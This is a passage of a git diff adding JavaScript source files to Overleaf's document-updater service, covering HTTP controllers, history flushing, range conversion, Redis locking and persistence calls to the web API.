DocumentManager.resyncDocContents, + projectId, + docId, + path, + opts + ) + }, +} + +module.exports = { + ...callbackifyAll(DocumentManager, { + multiResult: { + getDoc: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'alreadyLoaded', + 'historyRangesSupport', + ], + getDocWithLock: [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'unflushedTime', + 'alreadyLoaded', + 'historyRangesSupport', + ], + getDocAndFlushIfOld: ['lines', 'version'], + getDocAndFlushIfOldWithLock: ['lines', 'version'], + getDocAndRecentOps: [ + 'lines', + 'version', + 'ops', + 'ranges', + 'pathname', + 'projectHistoryId', + ], + getDocAndRecentOpsWithLock: [ + 'lines', + 'version', + 'ops', + 'ranges', + 'pathname', + 'projectHistoryId', + ], + getCommentWithLock: ['comment'], + }, + }), + promises: DocumentManager, +} diff --git a/services/document-updater/app/js/Errors.js b/services/document-updater/app/js/Errors.js new file mode 100644 index 0000000..a43f69a --- /dev/null +++ b/services/document-updater/app/js/Errors.js @@ -0,0 +1,15 @@ +const OError = require('@overleaf/o-error') + +class NotFoundError extends OError {} +class OpRangeNotAvailableError extends OError {} +class ProjectStateChangedError extends OError {} +class DeleteMismatchError extends OError {} +class FileTooLargeError extends OError {} + +module.exports = { + NotFoundError, + OpRangeNotAvailableError, + ProjectStateChangedError, + DeleteMismatchError, + FileTooLargeError, +} diff --git a/services/document-updater/app/js/HistoryConversions.js b/services/document-updater/app/js/HistoryConversions.js new file mode 100644 index 0000000..50db911 --- /dev/null +++ b/services/document-updater/app/js/HistoryConversions.js @@ -0,0 +1,179 @@ +// @ts-check + +const _ = require('lodash') +const { isDelete } = require('./Utils') + +/** + * @import { Comment, HistoryComment, HistoryRanges, HistoryTrackedChange } from './types' + * @import { Ranges, TrackedChange } from './types' + */ + +/** + * Convert editor ranges to history ranges + * + * @param {Ranges} ranges + * @return {HistoryRanges} + */ +function toHistoryRanges(ranges) { + const changes = ranges.changes ?? [] + const comments = (ranges.comments ?? 
[]).slice() + + // Changes are assumed to be sorted, but not comments + comments.sort((a, b) => a.op.p - b.op.p) + + /** + * This will allow us to go through comments at a different pace as we loop + * through tracked changes + */ + const commentsIterator = new CommentsIterator(comments) + + /** + * Current offset between editor pos and history pos + */ + let offset = 0 + + /** + * History comments that might overlap with the tracked change considered + * + * @type {HistoryComment[]} + */ + let pendingComments = [] + + /** + * The final history comments generated + * + * @type {HistoryComment[]} + */ + const historyComments = [] + + /** + * The final history tracked changes generated + * + * @type {HistoryTrackedChange[]} + */ + const historyChanges = [] + + for (const change of changes) { + historyChanges.push(toHistoryChange(change, offset)) + + // After this point, we're only interested in tracked deletes + if (!isDelete(change.op)) { + continue + } + + // Fill pendingComments with new comments that start before this tracked + // delete and might overlap + for (const comment of commentsIterator.nextComments(change.op.p)) { + pendingComments.push(toHistoryComment(comment, offset)) + } + + // Save comments that are fully before this tracked delete + const newPendingComments = [] + for (const historyComment of pendingComments) { + const commentEnd = historyComment.op.p + historyComment.op.c.length + if (commentEnd <= change.op.p) { + historyComments.push(historyComment) + } else { + newPendingComments.push(historyComment) + } + } + pendingComments = newPendingComments + + // The rest of pending comments overlap with this tracked change. Adjust + // their history length. + for (const historyComment of pendingComments) { + historyComment.op.hlen = + (historyComment.op.hlen ?? 
historyComment.op.c.length) + + change.op.d.length + } + + // Adjust the offset + offset += change.op.d.length + } + // Save the last pending comments + for (const historyComment of pendingComments) { + historyComments.push(historyComment) + } + + // Save any comments that came after the last tracked change + for (const comment of commentsIterator.nextComments()) { + historyComments.push(toHistoryComment(comment, offset)) + } + + const historyRanges = {} + if (historyComments.length > 0) { + historyRanges.comments = historyComments + } + if (historyChanges.length > 0) { + historyRanges.changes = historyChanges + } + return historyRanges +} + +class CommentsIterator { + /** + * Build a CommentsIterator + * + * @param {Comment[]} comments + */ + constructor(comments) { + this.comments = comments + this.currentIndex = 0 + } + + /** + * Generator that returns the next comments to consider + * + * @param {number} beforePos - only return comments that start before this position + * @return {Iterable<Comment>} + */ + *nextComments(beforePos = Infinity) { + while (this.currentIndex < this.comments.length) { + const comment = this.comments[this.currentIndex] + if (comment.op.p < beforePos) { + yield comment + this.currentIndex += 1 + } else { + return + } + } + } +} + +/** + * Convert an editor tracked change into a history tracked change + * + * @param {TrackedChange} change + * @param {number} offset - how much the history change is ahead of the + * editor change + * @return {HistoryTrackedChange} + */ +function toHistoryChange(change, offset) { + /** @type {HistoryTrackedChange} */ + const historyChange = _.cloneDeep(change) + if (offset > 0) { + historyChange.op.hpos = change.op.p + offset + } + return historyChange +} + +/** + * Convert an editor comment into a history comment + * + * @param {Comment} comment + * @param {number} offset - how much the history comment is ahead of the + * editor comment + * @return {HistoryComment} + */ +function toHistoryComment(comment, offset) { + /** @type {HistoryComment} */ + const historyComment = _.cloneDeep(comment) + if (offset > 0) { + historyComment.op.hpos = comment.op.p + offset + } + return historyComment +} + +module.exports = { + toHistoryRanges, +} diff --git a/services/document-updater/app/js/HistoryManager.js b/services/document-updater/app/js/HistoryManager.js new file mode 100644 index 0000000..3963431 --- /dev/null +++ b/services/document-updater/app/js/HistoryManager.js @@ -0,0 +1,143 @@ +const async = require('async') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') +const request = require('request') +const Settings = require('@overleaf/settings') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const metrics = require('./Metrics') + +const HistoryManager = { + // flush changes in the background + flushProjectChangesAsync(projectId) { + HistoryManager.flushProjectChanges( + projectId, + { background: true }, + function () {} + ) + }, + + // flush changes and callback (for when we need to know the queue is flushed) + flushProjectChanges(projectId, options, callback) { + if (callback == null) { + callback = function () {} + } + if (options.skip_history_flush) { + logger.debug({ projectId }, 'skipping flush of project history') + return callback() + } + metrics.inc('history-flush', 1, { status: 'project-history' }) + const url = `${Settings.apis.project_history.url}/project/${projectId}/flush` + const qs = {} + if (options.background) { + qs.background = 
true
+    } // pass on the background flush option if present
+    logger.debug({ projectId, url, qs }, 'flushing doc in project history api')
+    request.post({ url, qs }, function (error, res, body) {
+      if (error) {
+        logger.error({ error, projectId }, 'project history api request failed')
+        callback(error)
+      } else if (res.statusCode < 200 || res.statusCode >= 300) {
+        logger.error(
+          { projectId },
+          `project history api returned a failure status code: ${res.statusCode}`
+        )
+        callback(
+          new Error(
+            `project history api returned a failure status code: ${res.statusCode}`
+          )
+        )
+      } else {
+        callback()
+      }
+    })
+  },
+
+  FLUSH_DOC_EVERY_N_OPS: 100,
+  FLUSH_PROJECT_EVERY_N_OPS: 500,
+
+  recordAndFlushHistoryOps(projectId, ops, projectOpsLength) {
+    if (ops == null) {
+      ops = []
+    }
+    if (ops.length === 0) {
+      return
+    }
+
+    // record updates for project history
+    if (
+      HistoryManager.shouldFlushHistoryOps(
+        projectOpsLength,
+        ops.length,
+        HistoryManager.FLUSH_PROJECT_EVERY_N_OPS
+      )
+    ) {
+      // Do this in the background since it uses HTTP and so may be too
+      // slow to wait for when processing a doc update.
+      logger.debug(
+        { projectOpsLength, projectId },
+        'flushing project history api'
+      )
+      HistoryManager.flushProjectChangesAsync(projectId)
+    }
+  },
+
+  shouldFlushHistoryOps(length, opsLength, threshold) {
+    if (!length) {
+      return false
+    } // don't flush unless we know the length
+    // We want to flush every 100 ops, i.e. 100, 200, 300, etc
+    // Find out which 'block' (i.e. 0-99, 100-199) we were in before and after pushing these
+    // ops. If we've changed, then we've gone over a multiple of 100 and should flush.
+    // (Most of the time, we will only hit 100 and then flushing will put us back to 0)
+    const previousLength = length - opsLength
+    const prevBlock = Math.floor(previousLength / threshold)
+    const newBlock = Math.floor(length / threshold)
+    return newBlock !== prevBlock
+  },
+
+  MAX_PARALLEL_REQUESTS: 4,
+
+  resyncProjectHistory(
+    projectId,
+    projectHistoryId,
+    docs,
+    files,
+    opts,
+    callback
+  ) {
+    ProjectHistoryRedisManager.queueResyncProjectStructure(
+      projectId,
+      projectHistoryId,
+      docs,
+      files,
+      opts,
+      function (error) {
+        if (error) {
+          return callback(error)
+        }
+        if (opts.resyncProjectStructureOnly) return callback()
+        const DocumentManager = require('./DocumentManager')
+        const resyncDoc = (doc, cb) => {
+          DocumentManager.resyncDocContentsWithLock(
+            projectId,
+            doc.doc,
+            doc.path,
+            opts,
+            cb
+          )
+        }
+        async.eachLimit(
+          docs,
+          HistoryManager.MAX_PARALLEL_REQUESTS,
+          resyncDoc,
+          callback
+        )
+      }
+    )
+  },
+}
+
+module.exports = HistoryManager
+module.exports.promises = promisifyAll(HistoryManager, {
+  without: [
+    'flushProjectChangesAsync',
+    'recordAndFlushHistoryOps',
+    'shouldFlushHistoryOps',
+  ],
+})
diff --git a/services/document-updater/app/js/HttpController.js b/services/document-updater/app/js/HttpController.js
new file mode 100644
index 0000000..95fe9b7
--- /dev/null
+++ b/services/document-updater/app/js/HttpController.js
@@ -0,0 +1,559 @@
+const DocumentManager = require('./DocumentManager')
+const HistoryManager = require('./HistoryManager')
+const ProjectManager = require('./ProjectManager')
+const RedisManager = require('./RedisManager')
+const Errors = require('./Errors')
+const logger = require('@overleaf/logger')
+const Settings = require('@overleaf/settings')
+const Metrics = require('./Metrics')
+const DeleteQueueManager = require('./DeleteQueueManager')
+const { getTotalSizeOfLines } = require('./Limits')
+const async = require('async')
+
+function getDoc(req, res, next) {
+  let fromVersion
+  const docId = 
req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'getting doc via http') + const timer = new Metrics.Timer('http.getDoc') + + if (req.query.fromVersion != null) { + fromVersion = parseInt(req.query.fromVersion, 10) + } else { + fromVersion = -1 + } + + DocumentManager.getDocAndRecentOpsWithLock( + projectId, + docId, + fromVersion, + (error, lines, version, ops, ranges, pathname) => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'got doc via http') + if (lines == null || version == null) { + return next(new Errors.NotFoundError('document not found')) + } + res.json({ + id: docId, + lines, + version, + ops, + ranges, + pathname, + ttlInS: RedisManager.DOC_OPS_TTL, + }) + } + ) +} + +function getComment(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const commentId = req.params.comment_id + + logger.debug({ projectId, docId, commentId }, 'getting comment via http') + + DocumentManager.getCommentWithLock( + projectId, + docId, + commentId, + (error, comment) => { + if (error) { + return next(error) + } + if (comment == null) { + return next(new Errors.NotFoundError('comment not found')) + } + res.json(comment) + } + ) +} + +// return the doc from redis if present, but don't load it from mongo +function peekDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'peeking at doc via http') + RedisManager.getDoc(projectId, docId, function (error, lines, version) { + if (error) { + return next(error) + } + if (lines == null || version == null) { + return next(new Errors.NotFoundError('document not found')) + } + res.json({ id: docId, lines, version }) + }) +} + +function getProjectDocsAndFlushIfOld(req, res, next) { + const projectId = req.params.project_id + const projectStateHash = req.query.state + // exclude is string of existing docs "id:version,id:version,..." + const excludeItems = + req.query.exclude != null ? req.query.exclude.split(',') : [] + logger.debug({ projectId, exclude: excludeItems }, 'getting docs via http') + const timer = new Metrics.Timer('http.getAllDocs') + const excludeVersions = {} + for (const item of excludeItems) { + const [id, version] = item.split(':') + excludeVersions[id] = version + } + logger.debug( + { projectId, projectStateHash, excludeVersions }, + 'excluding versions' + ) + ProjectManager.getProjectDocsAndFlushIfOld( + projectId, + projectStateHash, + excludeVersions, + (error, result) => { + timer.done() + if (error instanceof Errors.ProjectStateChangedError) { + res.sendStatus(409) // conflict + } else if (error) { + next(error) + } else { + logger.debug( + { + projectId, + result: result.map(doc => `${doc._id}:${doc.v}`), + }, + 'got docs via http' + ) + res.send(result) + } + } + ) +} + +function getProjectLastUpdatedAt(req, res, next) { + const projectId = req.params.project_id + ProjectManager.getProjectDocsTimestamps(projectId, (err, timestamps) => { + if (err) return next(err) + + // Filter out nulls. This can happen when + // - docs get flushed between the listing and getting the individual docs ts + // - a doc flush failed half way (doc keys removed, project tracking not updated) + timestamps = timestamps.filter(ts => !!ts) + + timestamps = timestamps.map(ts => parseInt(ts, 10)) + timestamps.sort((a, b) => (a > b ? 
1 : -1)) + res.json({ lastUpdatedAt: timestamps.pop() }) + }) +} + +function clearProjectState(req, res, next) { + const projectId = req.params.project_id + const timer = new Metrics.Timer('http.clearProjectState') + logger.debug({ projectId }, 'clearing project state via http') + ProjectManager.clearProjectState(projectId, error => { + timer.done() + if (error) { + next(error) + } else { + res.sendStatus(200) + } + }) +} + +function setDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const { lines, source, user_id: userId, undoing } = req.body + const lineSize = getTotalSizeOfLines(lines) + if (lineSize > Settings.max_doc_length) { + logger.warn( + { projectId, docId, source, lineSize, userId }, + 'document too large, returning 406 response' + ) + return res.sendStatus(406) + } + logger.debug( + { projectId, docId, lines, source, userId, undoing }, + 'setting doc via http' + ) + const timer = new Metrics.Timer('http.setDoc') + DocumentManager.setDocWithLock( + projectId, + docId, + lines, + source, + userId, + undoing, + true, + (error, result) => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'set doc via http') + res.json(result) + } + ) +} + +function appendToDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const { lines, source, user_id: userId } = req.body + const timer = new Metrics.Timer('http.appendToDoc') + DocumentManager.appendToDocWithLock( + projectId, + docId, + lines, + source, + userId, + (error, result) => { + timer.done() + if (error instanceof Errors.FileTooLargeError) { + logger.warn('refusing to append to file, it would become too large') + return res.sendStatus(422) + } + if (error) { + return next(error) + } + logger.debug( + { projectId, docId, lines, source, userId }, + 'appending to doc via http' + ) + res.json(result) + } + ) +} + +function flushDocIfLoaded(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + logger.debug({ projectId, docId }, 'flushing doc via http') + const timer = new Metrics.Timer('http.flushDoc') + DocumentManager.flushDocIfLoadedWithLock(projectId, docId, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'flushed doc via http') + res.sendStatus(204) // No Content + }) +} + +function deleteDoc(req, res, next) { + const docId = req.params.doc_id + const projectId = req.params.project_id + const ignoreFlushErrors = req.query.ignore_flush_errors === 'true' + const timer = new Metrics.Timer('http.deleteDoc') + logger.debug({ projectId, docId }, 'deleting doc via http') + DocumentManager.flushAndDeleteDocWithLock( + projectId, + docId, + { ignoreFlushErrors }, + error => { + timer.done() + // There is no harm in flushing project history if the previous call + // failed and sometimes it is required + HistoryManager.flushProjectChangesAsync(projectId) + + if (error) { + return next(error) + } + logger.debug({ projectId, docId }, 'deleted doc via http') + res.sendStatus(204) // No Content + } + ) +} + +function flushProject(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'flushing project via http') + const timer = new Metrics.Timer('http.flushProject') + ProjectManager.flushProjectWithLocks(projectId, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'flushed project via http') + res.sendStatus(204) // No Content + }) +} 
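One detail worth calling out for `setDoc` above: the submitted lines are not stored verbatim. `DocumentManager.setDoc` (earlier in this diff) diffs them against the current content with `DiffCodec.diffAsShareJsOp` and applies the result as an ordinary update, so unchanged text keeps its history. A small sketch of the op shape this produces, with illustrative inputs (run from `services/document-updater`):

```js
// diffAsShareJsOp joins each side with '\n', diffs the two strings, and emits
// ShareJS text ops: { i: text, p: pos } for inserts, { d: text, p: pos } for
// deletes. The inputs below are made up for illustration.
const DiffCodec = require('./app/js/DiffCodec')

const before = ['hello world']
const after = ['hello brave new world']

const ops = DiffCodec.diffAsShareJsOp(before, after)
console.log(ops) // expected: [ { i: 'brave new ', p: 6 } ]
```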
+ +function deleteProject(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'deleting project via http') + const options = {} + if (req.query.background) { + options.background = true + } // allow non-urgent flushes to be queued + if (req.query.shutdown) { + options.skip_history_flush = true + } // don't flush history when realtime shuts down + if (req.query.background) { + ProjectManager.queueFlushAndDeleteProject(projectId, error => { + if (error) { + return next(error) + } + logger.debug({ projectId }, 'queue delete of project via http') + res.sendStatus(204) + }) // No Content + } else { + const timer = new Metrics.Timer('http.deleteProject') + ProjectManager.flushAndDeleteProjectWithLocks(projectId, options, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'deleted project via http') + res.sendStatus(204) // No Content + }) + } +} + +function deleteMultipleProjects(req, res, next) { + const projectIds = req.body.project_ids || [] + logger.debug({ projectIds }, 'deleting multiple projects via http') + async.eachSeries( + projectIds, + (projectId, cb) => { + logger.debug({ projectId }, 'queue delete of project via http') + ProjectManager.queueFlushAndDeleteProject(projectId, cb) + }, + error => { + if (error) { + return next(error) + } + res.sendStatus(204) // No Content + } + ) +} + +function acceptChanges(req, res, next) { + const { project_id: projectId, doc_id: docId } = req.params + let changeIds = req.body.change_ids + if (changeIds == null) { + changeIds = [req.params.change_id] + } + logger.debug( + { projectId, docId }, + `accepting ${changeIds.length} changes via http` + ) + const timer = new Metrics.Timer('http.acceptChanges') + DocumentManager.acceptChangesWithLock(projectId, docId, changeIds, error => { + timer.done() + if (error) { + return next(error) + } + logger.debug( + { projectId, docId }, + `accepted ${changeIds.length} changes via http` + ) + res.sendStatus(204) // No Content + }) +} + +function resolveComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'resolving comment via http') + DocumentManager.updateCommentStateWithLock( + projectId, + docId, + commentId, + userId, + true, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId, docId, commentId }, 'resolved comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function reopenComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'reopening comment via http') + DocumentManager.updateCommentStateWithLock( + projectId, + docId, + commentId, + userId, + false, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId, docId, commentId }, 'reopened comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function deleteComment(req, res, next) { + const { + project_id: projectId, + doc_id: docId, + comment_id: commentId, + } = req.params + const userId = req.body.user_id + logger.debug({ projectId, docId, commentId }, 'deleting comment via http') + const timer = new Metrics.Timer('http.deleteComment') + DocumentManager.deleteCommentWithLock( + projectId, + docId, + commentId, + userId, + error => { + timer.done() + if (error) { + return next(error) + } + 
logger.debug({ projectId, docId, commentId }, 'deleted comment via http') + res.sendStatus(204) // No Content + } + ) +} + +function updateProject(req, res, next) { + const timer = new Metrics.Timer('http.updateProject') + const projectId = req.params.project_id + const { projectHistoryId, userId, updates = [], version, source } = req.body + logger.debug({ projectId, updates, version }, 'updating project via http') + ProjectManager.updateProjectWithLocks( + projectId, + projectHistoryId, + userId, + updates, + version, + source, + error => { + timer.done() + if (error) { + return next(error) + } + logger.debug({ projectId }, 'updated project via http') + res.sendStatus(204) // No Content + } + ) +} + +function resyncProjectHistory(req, res, next) { + const projectId = req.params.project_id + const { + projectHistoryId, + docs, + files, + historyRangesMigration, + resyncProjectStructureOnly, + } = req.body + + logger.debug( + { projectId, docs, files }, + 'queuing project history resync via http' + ) + + const opts = {} + if (historyRangesMigration) { + opts.historyRangesMigration = historyRangesMigration + } + if (resyncProjectStructureOnly) { + opts.resyncProjectStructureOnly = resyncProjectStructureOnly + } + + HistoryManager.resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts, + error => { + if (error) { + return next(error) + } + logger.debug({ projectId }, 'queued project history resync via http') + res.sendStatus(204) + } + ) +} + +function flushQueuedProjects(req, res, next) { + res.setTimeout(10 * 60 * 1000) + const options = { + limit: req.query.limit || 1000, + timeout: 5 * 60 * 1000, + min_delete_age: req.query.min_delete_age || 5 * 60 * 1000, + } + DeleteQueueManager.flushAndDeleteOldProjects(options, (err, flushed) => { + if (err) { + logger.err({ err }, 'error flushing old projects') + res.sendStatus(500) + } else { + logger.info({ flushed }, 'flush of queued projects completed') + res.send({ flushed }) + } + }) +} + +/** + * Block a project from getting loaded in docupdater + * + * The project is blocked only if it's not already loaded in docupdater. The + * response indicates whether the project has been blocked or not. 
+ */
+function blockProject(req, res, next) {
+  const projectId = req.params.project_id
+  RedisManager.blockProject(projectId, (err, blocked) => {
+    if (err) {
+      return next(err)
+    }
+    res.json({ blocked })
+  })
+}
+
+/**
+ * Unblock a project
+ */
+function unblockProject(req, res, next) {
+  const projectId = req.params.project_id
+  RedisManager.unblockProject(projectId, (err, wasBlocked) => {
+    if (err) {
+      return next(err)
+    }
+    res.json({ wasBlocked })
+  })
+}
+
+module.exports = {
+  getDoc,
+  peekDoc,
+  getProjectDocsAndFlushIfOld,
+  getProjectLastUpdatedAt,
+  clearProjectState,
+  appendToDoc,
+  setDoc,
+  flushDocIfLoaded,
+  deleteDoc,
+  flushProject,
+  deleteProject,
+  deleteMultipleProjects,
+  acceptChanges,
+  resolveComment,
+  reopenComment,
+  deleteComment,
+  updateProject,
+  resyncProjectHistory,
+  flushQueuedProjects,
+  blockProject,
+  unblockProject,
+  getComment,
+}
diff --git a/services/document-updater/app/js/Limits.js b/services/document-updater/app/js/Limits.js
new file mode 100644
index 0000000..268ccd3
--- /dev/null
+++ b/services/document-updater/app/js/Limits.js
@@ -0,0 +1,31 @@
+module.exports = {
+  // compute the total size of the document in characters, including newlines
+  getTotalSizeOfLines(lines) {
+    let size = 0
+    for (const line of lines) {
+      size += line.length + 1 // include the newline
+    }
+    return size
+  },
+
+  // check whether the total size of the document in characters exceeds the
+  // maxDocLength.
+  //
+  // The estimated size should be an upper bound on the true size, typically
+  // it will be the size of the JSON.stringified array of lines. If the
+  // estimated size is less than the maxDocLength then we know that the total
+  // size of lines will also be less than maxDocLength.
+  docIsTooLarge(estimatedSize, lines, maxDocLength) {
+    if (estimatedSize <= maxDocLength) {
+      return false // definitely under the limit, no need to calculate the total size
+    }
+    // calculate the total size, bailing out early if the size limit is reached
+    let size = 0
+    for (const line of lines) {
+      size += line.length + 1 // include the newline
+      if (size > maxDocLength) return true
+    }
+    // since we didn't hit the limit in the loop, the document is within the allowed length
+    return false
+  },
+}
diff --git a/services/document-updater/app/js/LockManager.js b/services/document-updater/app/js/LockManager.js
new file mode 100644
index 0000000..a65ab9f
--- /dev/null
+++ b/services/document-updater/app/js/LockManager.js
@@ -0,0 +1,18 @@
+const Settings = require('@overleaf/settings')
+const redis = require('@overleaf/redis-wrapper')
+const rclient = redis.createClient(Settings.redis.lock)
+const keys = Settings.redis.lock.key_schema
+const RedisLocker = require('@overleaf/redis-wrapper/RedisLocker')
+
+module.exports = new RedisLocker({
+  rclient,
+  getKey(docId) {
+    return keys.blockingKey({ doc_id: docId })
+  },
+  wrapTimeoutError(err, docId) {
+    err.doc_id = docId
+    return err
+  },
+  metricsPrefix: 'doc',
+  lockTTLSeconds: Settings.redisLockTTLSeconds,
+})
diff --git a/services/document-updater/app/js/LoggerSerializers.js b/services/document-updater/app/js/LoggerSerializers.js
new file mode 100644
index 0000000..3aa8bfc
--- /dev/null
+++ b/services/document-updater/app/js/LoggerSerializers.js
@@ -0,0 +1,51 @@
+/* eslint-disable
+    no-return-assign,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const _ = require('lodash') + +const showLength = function (thing) { + if (thing != null ? thing.length : undefined) { + return thing.length + } else { + return thing + } +} + +const showUpdateLength = function (update) { + if ((update != null ? update.op : undefined) instanceof Array) { + const copy = _.cloneDeep(update) + copy.op.forEach(function (element, index) { + if (element?.i?.length != null) { + copy.op[index].i = element.i.length + } + if (element?.d?.length != null) { + copy.op[index].d = element.d.length + } + if (element?.c?.length != null) { + return (copy.op[index].c = element.c.length) + } + }) + return copy + } else { + return update + } +} + +module.exports = { + // replace long values with their length + lines: showLength, + oldLines: showLength, + newLines: showLength, + docLines: showLength, + newDocLines: showLength, + ranges: showLength, + update: showUpdateLength, +} diff --git a/services/document-updater/app/js/Metrics.js b/services/document-updater/app/js/Metrics.js new file mode 100644 index 0000000..f0e5779 --- /dev/null +++ b/services/document-updater/app/js/Metrics.js @@ -0,0 +1,3 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +module.exports = require('@overleaf/metrics') diff --git a/services/document-updater/app/js/PersistenceManager.js b/services/document-updater/app/js/PersistenceManager.js new file mode 100644 index 0000000..b08994a --- /dev/null +++ b/services/document-updater/app/js/PersistenceManager.js @@ -0,0 +1,196 @@ +const { promisify } = require('node:util') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') +const Errors = require('./Errors') +const Metrics = require('./Metrics') +const logger = require('@overleaf/logger') +const request = require('requestretry').defaults({ + maxAttempts: 2, + retryDelay: 10, +}) + +// We have to be quick with HTTP calls because we're holding a lock that +// expires after 30 seconds. We can't let any errors in the rest of the stack +// hold us up, and need to bail out quickly if there is a problem. 
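getDoc and setDoc below report their results through callbacks; the promises export at the bottom of this file wraps getDoc with promisifyMultiResult so the multiple callback results come back as one object, assuming the usual @overleaf/promise-utils behaviour of keying the resolved object by the listed result names. A usage sketch with hypothetical ids:

const PersistenceManager = require('./PersistenceManager')

async function loadDoc() {
  const { lines, version, pathname } =
    await PersistenceManager.promises.getDoc('some-project-id', 'some-doc-id')
  console.log(pathname, version, lines.length)
}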
+const MAX_HTTP_REQUEST_LENGTH = 5000 // 5 seconds + +function updateMetric(method, error, response) { + // find the status, with special handling for connection timeouts + // https://github.com/request/request#timeouts + let status + if (error && error.connect === true) { + status = `${error.code} (connect)` + } else if (error) { + status = error.code + } else if (response) { + status = response.statusCode + } + + Metrics.inc(method, 1, { status }) + if (error && error.attempts > 1) { + Metrics.inc(`${method}-retries`, 1, { status: 'error' }) + } + if (response && response.attempts > 1) { + Metrics.inc(`${method}-retries`, 1, { status: 'success' }) + } +} + +function getDoc(projectId, docId, options = {}, _callback) { + const timer = new Metrics.Timer('persistenceManager.getDoc') + if (typeof options === 'function') { + _callback = options + options = {} + } + const callback = function (...args) { + timer.done() + _callback(...args) + } + + const urlPath = `/project/${projectId}/doc/${docId}` + const requestParams = { + url: `${Settings.apis.web.url}${urlPath}`, + method: 'GET', + headers: { + accept: 'application/json', + }, + auth: { + user: Settings.apis.web.user, + pass: Settings.apis.web.pass, + sendImmediately: true, + }, + jar: false, + timeout: MAX_HTTP_REQUEST_LENGTH, + } + if (options.peek) { + requestParams.qs = { peek: 'true' } + } + request(requestParams, (error, res, body) => { + updateMetric('getDoc', error, res) + if (error) { + logger.error({ err: error, projectId, docId }, 'web API request failed') + return callback(new Error('error connecting to web API')) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + try { + body = JSON.parse(body) + } catch (e) { + return callback(e) + } + if (body.lines == null) { + return callback(new Error('web API response had no doc lines')) + } + if (body.version == null) { + return callback(new Error('web API response had no valid doc version')) + } + if (body.pathname == null) { + return callback(new Error('web API response had no valid doc pathname')) + } + if (!body.pathname) { + logger.warn( + { projectId, docId }, + 'missing pathname in PersistenceManager getDoc' + ) + Metrics.inc('pathname', 1, { + path: 'PersistenceManager.getDoc', + status: body.pathname === '' ? 
'zero-length' : 'undefined',
+        })
+      }
+      callback(
+        null,
+        body.lines,
+        body.version,
+        body.ranges,
+        body.pathname,
+        body.projectHistoryId?.toString(),
+        body.historyRangesSupport || false,
+        body.resolvedCommentIds || []
+      )
+    } else if (res.statusCode === 404) {
+      callback(new Errors.NotFoundError(`doc not found: ${urlPath}`))
+    } else if (res.statusCode === 413) {
+      callback(
+        new Errors.FileTooLargeError(`doc exceeds maximum size: ${urlPath}`)
+      )
+    } else {
+      callback(
+        new Error(`error accessing web API: ${urlPath} ${res.statusCode}`)
+      )
+    }
+  })
+}
+
+function setDoc(
+  projectId,
+  docId,
+  lines,
+  version,
+  ranges,
+  lastUpdatedAt,
+  lastUpdatedBy,
+  _callback
+) {
+  const timer = new Metrics.Timer('persistenceManager.setDoc')
+  const callback = function (...args) {
+    timer.done()
+    _callback(...args)
+  }
+
+  const urlPath = `/project/${projectId}/doc/${docId}`
+  request(
+    {
+      url: `${Settings.apis.web.url}${urlPath}`,
+      method: 'POST',
+      json: {
+        lines,
+        ranges,
+        version,
+        lastUpdatedBy,
+        lastUpdatedAt,
+      },
+      auth: {
+        user: Settings.apis.web.user,
+        pass: Settings.apis.web.pass,
+        sendImmediately: true,
+      },
+      jar: false,
+      timeout: MAX_HTTP_REQUEST_LENGTH,
+    },
+    (error, res, body) => {
+      updateMetric('setDoc', error, res)
+      if (error) {
+        logger.error({ err: error, projectId, docId }, 'web API request failed')
+        return callback(new Error('error connecting to web API'))
+      }
+      if (res.statusCode >= 200 && res.statusCode < 300) {
+        callback(null, body)
+      } else if (res.statusCode === 404) {
+        callback(new Errors.NotFoundError(`doc not found: ${urlPath}`))
+      } else if (res.statusCode === 413) {
+        callback(
+          new Errors.FileTooLargeError(`doc exceeds maximum size: ${urlPath}`)
+        )
+      } else {
+        callback(
+          new Error(`error accessing web API: ${urlPath} ${res.statusCode}`)
+        )
+      }
+    }
+  )
+}
+
+module.exports = {
+  getDoc,
+  setDoc,
+  promises: {
+    getDoc: promisifyMultiResult(getDoc, [
+      'lines',
+      'version',
+      'ranges',
+      'pathname',
+      'projectHistoryId',
+      'historyRangesSupport',
+      'resolvedCommentIds',
+    ]),
+    setDoc: promisify(setDoc),
+  },
+}
diff --git a/services/document-updater/app/js/Profiler.js b/services/document-updater/app/js/Profiler.js
new file mode 100644
index 0000000..8daac4c
--- /dev/null
